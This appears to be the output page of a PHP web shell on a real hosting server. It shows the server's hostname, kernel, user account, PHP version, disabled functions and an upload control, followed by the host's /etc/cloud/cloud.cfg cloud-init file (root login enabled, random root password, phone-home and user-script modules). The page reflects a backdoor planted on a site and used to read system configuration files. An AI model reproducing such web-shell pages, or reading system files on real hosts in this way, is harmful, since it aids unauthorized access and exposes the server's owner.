HEX
Server: Apache
System: Linux 66-116-199-115.webhostbox.net 5.14.0-427.31.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 15 14:47:52 EDT 2024 x86_64
User: blushinc (1003)
PHP: 8.2.29
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //etc/cloud/cloud.cfg
users:
  - default

chpasswd:
  list: |
    root: RANDOM
  expire: False

disable_root: 0
resize_rootfs_tmp: /dev
syslog_fix_perms: ~
network: {config: disabled}
preserve_hostname: true

cloud_init_modules:
  - growpart
  - resizefs
  - update_etc_hosts

cloud_config_modules:
  - runcmd
  - set-passwords
  - disable-ec2-metadata

datasource_list: ['None']

cloud_final_modules:
  - phone-home
  - final-message
  - scripts-per-once
  - scripts-per-boot
  - scripts-per-instance
  - scripts-user

system_info:
  default_user:
    name: root
    lock_passwd: false
    shell: /bin/bash
  distro: rhel
  paths:
    cloud_dir: /var/lib/cloud
    templates_dir: /etc/cloud/templates
  ssh_svcname: sshd

# vim:syntax=yaml